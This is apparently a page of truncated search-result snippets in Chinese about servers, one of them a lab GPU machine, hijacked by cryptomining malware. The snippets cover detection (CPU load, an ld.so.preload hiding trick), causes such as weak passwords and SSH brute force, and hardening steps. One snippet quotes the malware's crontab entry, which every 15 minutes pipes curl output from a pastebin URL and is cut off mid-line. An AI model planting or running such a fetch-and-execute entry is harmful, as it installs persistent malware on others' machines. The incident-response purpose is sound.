痛心：實驗室服務器被黑挖礦怎么辦？ 痛心：實驗室服務器被黑挖礦怎么辦？ 更改SSH配置 限制IP訪問 設置Linux-PAM 開啟防火牆 查看日志 參考資料 實驗室的服務器有比較高的配置，安裝了多塊顯卡，平時實驗室 ...

什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內網滲透 ...

查看哪個進程占據cup 通過 top 或者使用 ps aux 我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看，里面也加載了異常的 ...

新的一天的開始 周五早上剛到公司，同事來問我系統為啥打不開了？我第一反應就是肯定 Nginx 服務器掛了唄，立馬就去登錄服務器看看，但此時發現已經完全遠程登錄不上這台部署了 Nginx 和 Redis 的服務器了，此刻心理活動如下： 難道服務器欠費了？ 難道服務器到期了？ 都不對阿，一起 ...

一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

最近很多小伙伴服務器都被挖礦了，簡單總結下在應急過程中，常遇到的一些被挖礦的特征，以及防護方法，工具后面會進行詳細的介紹分享。 問題所在 要防止被挖礦，首先要明白挖礦的本質。挖礦本質就是快速產出，利用可以利用的資源，實現快速產出，獲取收益 ...

上個月末，我也嘗試到了服務器被病毒入侵的滋味，正好這個月末來復盤一下。 怎么說呢，那個感覺就像是你自己的娃在外面被揍了一樣，你得想辦法為孩子出人頭地呀，是吧。於是這一波病毒反擊戰就正式上演了。 ## 一出好戲 先說一下我是怎么發現服務器被入侵的。那是在一個愉快的下班時間，我的手機端又提示收到了阿里 ...

這幾天阿里雲雲服務器cpu一直跑滿，一查發現有個定時任務，在搜索一下，發現自己中毒了，原來前幾天搞redis學習的時候設置了個弱密碼，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...